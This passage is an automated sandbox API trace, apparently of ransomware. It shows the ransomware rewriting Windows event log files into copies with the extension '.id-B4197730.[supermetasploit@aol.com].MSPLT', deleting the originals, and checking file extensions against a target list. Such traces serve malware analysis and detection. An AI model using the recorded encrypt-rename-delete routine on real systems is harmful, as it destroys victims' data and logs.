nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.657] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.659] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.660] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x128, lpOverlapped=0x0) returned 1 [0293.660] SetEndOfFile (hFile=0x37c) returned 1 [0293.660] CloseHandle (hObject=0x37c) returned 1 [0293.664] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.664] SetEndOfFile (hFile=0x464) returned 1 [0293.666] CloseHandle (hObject=0x464) returned 1 [0293.666] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.666] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 1 [0293.667] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.667] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.667] lstrlenW (lpString=".doc") returned 4 [0293.667] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.667] lstrlenW (lpString=".docx") returned 5 [0293.667] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.667] lstrlenW (lpString=".pdf") returned 4 [0293.667] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.667] lstrlenW (lpString=".xls") returned 4 [0293.667] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.667] lstrlenW (lpString=".xlsx") returned 5 [0293.667] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.667] lstrlenW (lpString=".ppt") returned 4 [0293.667] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.667] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.667] lstrlenW (lpString=".zip") returned 4 [0293.667] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.667] lstrlenW (lpString=".rar") returned 4 [0293.667] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString=".bz2") returned 4 [0293.668] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString=".7z") returned 3 [0293.668] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.668] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.668] lstrlenW (lpString=".dbf") returned 4 [0293.668] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.668] lstrlenW (lpString=".1cd") returned 4 [0293.668] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.668] lstrlenW (lpString=".jpg") returned 4 [0293.668] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.668] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.668] lstrlenW (lpString=".doc") returned 4 [0293.668] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString=".docx") returned 5 [0293.668] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.668] lstrlenW (lpString=".pdf") returned 4 [0293.668] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString=".xls") returned 4 [0293.668] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.668] lstrlenW (lpString=".xlsx") returned 5 [0293.668] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.668] lstrlenW (lpString=".ppt") returned 4 [0293.669] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.669] lstrlenW (lpString=".zip") returned 4 [0293.669] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString=".rar") returned 4 [0293.669] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString=".bz2") returned 4 [0293.669] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString=".7z") returned 3 [0293.669] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.669] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.669] lstrlenW (lpString=".dbf") returned 4 [0293.669] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.669] lstrlenW (lpString=".1cd") returned 4 [0293.669] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.669] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0293.669] lstrlenW (lpString=".jpg") returned 4 [0293.669] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.669] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.669] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 46 [0293.669] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.670] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0293.670] CloseHandle (hObject=0x464) returned 1 [0293.670] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 0x20 [0293.671] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.671] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.671] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.671] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.671] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0293.672] GetLastError () returned 0x0 [0293.672] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.699] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.701] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.701] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x130, lpOverlapped=0x0) returned 1 [0293.701] SetEndOfFile (hFile=0x37c) returned 1 [0293.701] CloseHandle (hObject=0x37c) returned 1 [0293.704] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.704] SetEndOfFile (hFile=0x464) returned 1 [0293.706] CloseHandle (hObject=0x464) returned 1 [0293.706] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.706] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 1 [0293.706] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.706] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.706] lstrlenW (lpString=".doc") returned 4 [0293.706] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.706] lstrlenW (lpString=".docx") returned 5 [0293.707] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.707] lstrlenW (lpString=".pdf") returned 4 [0293.707] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString=".xls") returned 4 [0293.707] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString=".xlsx") returned 5 [0293.707] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.707] lstrlenW (lpString=".ppt") returned 4 [0293.707] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.707] lstrlenW (lpString=".zip") returned 4 [0293.707] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString=".rar") returned 4 [0293.707] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString=".bz2") returned 4 [0293.707] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString=".7z") returned 3 [0293.707] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.707] lstrlenW (lpString=".dbf") returned 4 [0293.707] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.707] lstrlenW (lpString=".1cd") returned 4 [0293.707] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.707] lstrlenW (lpString=".jpg") returned 4 [0293.707] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.707] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.708] lstrlenW (lpString=".doc") returned 4 [0293.708] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".docx") returned 5 [0293.708] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.708] lstrlenW (lpString=".pdf") returned 4 [0293.708] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".xls") returned 4 [0293.708] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".xlsx") returned 5 [0293.708] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.708] lstrlenW (lpString=".ppt") returned 4 [0293.708] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.708] lstrlenW (lpString=".zip") returned 4 [0293.708] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".rar") returned 4 [0293.708] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".bz2") returned 4 [0293.708] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString=".7z") returned 3 [0293.708] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.708] lstrlenW (lpString=".dbf") returned 4 [0293.708] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.708] lstrlenW (lpString=".1cd") returned 4 [0293.708] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0293.708] lstrlenW (lpString=".jpg") returned 4 [0293.708] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.709] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.709] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Security.evtx") returned 42 [0293.709] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.709] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0293.709] CloseHandle (hObject=0x464) returned 1 [0293.709] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 0x20 [0293.709] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.710] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.710] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.710] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.710] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0294.305] GetLastError () returned 0x0 [0294.305] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.309] WriteFile (in: hFile=0x48c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.311] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.311] WriteFile (in: hFile=0x48c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x128, lpOverlapped=0x0) returned 1 [0294.312] SetEndOfFile (hFile=0x48c) returned 1 [0294.312] CloseHandle (hObject=0x48c) returned 1 [0294.316] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.316] SetEndOfFile (hFile=0x464) returned 1 [0294.318] CloseHandle (hObject=0x464) returned 1 [0294.318] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.319] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 1 [0294.319] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.319] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.319] lstrlenW (lpString=".doc") returned 4 [0294.319] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.319] lstrlenW (lpString=".docx") returned 5 [0294.319] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.320] lstrlenW (lpString=".pdf") returned 4 [0294.320] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString=".xls") returned 4 [0294.320] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString=".xlsx") returned 5 [0294.320] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.320] lstrlenW (lpString=".ppt") returned 4 [0294.320] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.320] lstrlenW (lpString=".zip") returned 4 [0294.320] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString=".rar") returned 4 [0294.320] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString=".bz2") returned 4 [0294.320] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString=".7z") returned 3 [0294.320] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.320] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.320] lstrlenW (lpString=".dbf") returned 4 [0294.320] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.320] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.321] lstrlenW (lpString=".1cd") returned 4 [0294.321] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.321] lstrlenW (lpString=".jpg") returned 4 [0294.321] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.321] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.321] lstrlenW (lpString=".doc") returned 4 [0294.321] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString=".docx") returned 5 [0294.321] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.321] lstrlenW (lpString=".pdf") returned 4 [0294.321] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString=".xls") returned 4 [0294.321] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString=".xlsx") returned 5 [0294.321] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.321] lstrlenW (lpString=".ppt") returned 4 [0294.321] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.321] lstrlenW (lpString=".zip") returned 4 [0294.321] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString=".rar") returned 4 [0294.321] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.321] lstrlenW (lpString=".bz2") returned 4 [0294.322] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.322] lstrlenW (lpString=".7z") returned 3 [0294.322] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.322] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.322] lstrlenW (lpString=".dbf") returned 4 [0294.322] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.322] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.322] lstrlenW (lpString=".1cd") returned 4 [0294.322] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.322] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0294.322] lstrlenW (lpString=".jpg") returned 4 [0294.322] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.322] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.322] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 66 [0294.322] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.323] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0294.323] CloseHandle (hObject=0x464) returned 1 [0294.323] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 0x20 [0294.323] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.323] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.323] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.323] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.323] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0294.325] GetLastError () returned 0x0 [0294.325] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.332] WriteFile (in: hFile=0x48c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.334] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.334] WriteFile (in: hFile=0x48c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x158, lpOverlapped=0x0) returned 1 [0294.334] SetEndOfFile (hFile=0x48c) returned 1 [0294.334] CloseHandle (hObject=0x48c) returned 1 [0294.606] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.606] SetEndOfFile (hFile=0x464) returned 1 [0294.652] CloseHandle (hObject=0x464) returned 1 [0294.652] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.652] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 1 [0294.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.653] lstrlenW 